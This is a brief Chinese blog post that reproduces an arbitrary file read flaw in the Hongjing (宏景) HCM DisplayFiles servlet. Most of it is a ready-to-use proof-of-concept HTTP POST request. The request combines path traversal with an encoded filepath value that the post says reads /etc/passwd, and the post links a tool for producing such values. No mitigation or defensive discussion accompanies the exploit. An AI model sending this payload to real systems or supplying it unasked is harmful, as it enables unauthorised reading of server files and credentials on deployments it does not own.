宏景HCM DisplayFiles任意文件读取

漏洞复现:

POC:

POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

漏洞利用成功
image

其中filepath的加密为读取/etc/passwd:

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

工具地址:https://github.com/wafinfo/DecryptTools
image

posted @ 2024-06-14 16:23  都吃泡芙  阅读(162)  评论(0)    收藏  举报
//雪花飘落效果 //雪花飘落效果